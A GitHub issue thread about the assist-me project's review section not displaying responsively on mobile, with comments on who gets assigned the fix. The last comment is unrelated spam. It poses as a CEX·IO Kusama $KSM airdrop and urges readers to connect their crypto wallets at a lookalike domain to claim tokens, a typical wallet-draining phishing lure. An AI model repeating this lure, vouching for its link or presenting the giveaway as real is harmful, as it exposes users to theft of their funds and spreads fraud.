### ISSUE TITLE
[BUG] Review Section Not Responsive in Smaller Screens

### ISSUE THREAD

**Issue by iamRabia-N** [FahimFBA/assist-me#36]
**Describe the bug**
The containers of review sections are not responsive in smaller screens.

**To Reproduce**
1. Go to "Review Section" from mobile
2. See error 

**Expected behavior**
Container properly aligned and equally spaced from all sides.

**Screenshots**
Current Design

![input (3)](https://github.com/FahimFBA/assist-me/assets/115794049/54800873-8ce9-4724-bab2-285733a32115)

Expected Updated Design

![input (4)](https://github.com/FahimFBA/assist-me/assets/115794049/e3fcaf5d-459d-47e3-89ce-d223d3b6c544)

**Desktop (please complete the following information):**
 - Browser [e.g. chrome]

**Additional context**
N/A

**Comment by ankur-dahiya** [comment]
please assign me this issue

**Comment by iamRabia-N** [comment]
@JoyShaheb Can I start working on this issue?

**Comment by JoyShaheb** [comment]
@iamRabia-N  sure go for it since you opened this first. best of luck. @ankur-dahiya I'll assign something else to you. @ankur-dahiya please check your github notifications

**Comment by JoyShaheb** [comment]
@ankur-dahiya  you do this https://github.com/FahimFBA/assist-me/issues/47

**Comment by luispurizacam** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
